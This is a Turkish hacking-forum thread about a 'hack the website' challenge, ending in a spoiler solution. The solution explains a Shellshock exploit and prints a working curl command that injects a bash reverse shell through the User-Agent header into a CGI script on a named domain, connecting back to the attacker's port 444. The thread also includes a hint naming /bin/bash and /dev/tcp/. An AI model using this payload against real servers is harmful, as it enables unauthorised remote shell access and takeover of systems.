Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
Meydan Okuma - Hack Website Vol. 2
Meydan Okuma - Hack Website Vol. 2
-
Oyunun içine etmek gibi olacak ama server yol geçen hanına dönmüş zaten adasdasd
edit:shell adresi kaldırıldı afasdasd
Bunların haricinde, olayı sadece mevcut site ile sınırlarsak daha güzel olur gibi. Sitede 3 tane açık buldum ama exploit edemedim maalesef(web tarafından baya kötüyüm)
-
emanet bilgisayardan hallettim simdi :d ücüncüsüne de aksama dogru bakarım, güzeldi ama bu
-
Andrei bunu yazdı
emanet bilgisayardan hallettim simdi :d ücüncüsüne de aksama dogru bakarım, güzeldi ama bu
Az önce farkettim helal olsun hocam :D Girmediğim yer kalmadı hala beceremedim
-
Site tamam da girecek yer sıkıntılı sanki
-
İpucu veriyorum: base64 rot13 /bin/bash /dev/tcp/
-
----- SPOILER COZUMU -----
----- SPOILER COZUMU -----
bunu bir kişinin çözebilmesi beni şaşırttı açıkcası çok fazla deneeyen oldu özellikle acunetixler dirbusterlar havalarda ucuştu bu challangeta ancak yanlış yapıldı hep
şimdi öncelikle kriptu
base64 ve ro13 olarak iki kere şifrelendi
http://runakay502.com domainine ulaışıyor çözdürüldügünde // base64decode.org/ http://rot13.com
buradaki güvenlik açıgı ise yazılımsal bir açık degil sistemsel bir açık bash sistemindeki açık sayesinde siteye backconnect yaparak dosyayı düzenleyecektiniz
bkz: https://en.wikipedia.org/wiki/Shellshock_(software_bug)
terminale girip ( curl yüklü oldugu farzediliyor )
curl -A '() { :; }; /bin/bash -i >& /dev/tcp/ipadresimiz/444 0>&1' http://www.runakay502.com/cgi-sys/suspendedpage.cgi
bu şekilde en basitinden curl ile kendi ip adresimize 444. porttan backconnect yapmaya olana sağladık ( tabikide o aanda kendi ağımızda 444. portumuzu listen etmemiz gerekiyor ki bağlanalım )
----- SPOILER COZUMU -----
----- SPOILER COZUMU -----
-
bu konular andrei virali gibi olmuş :D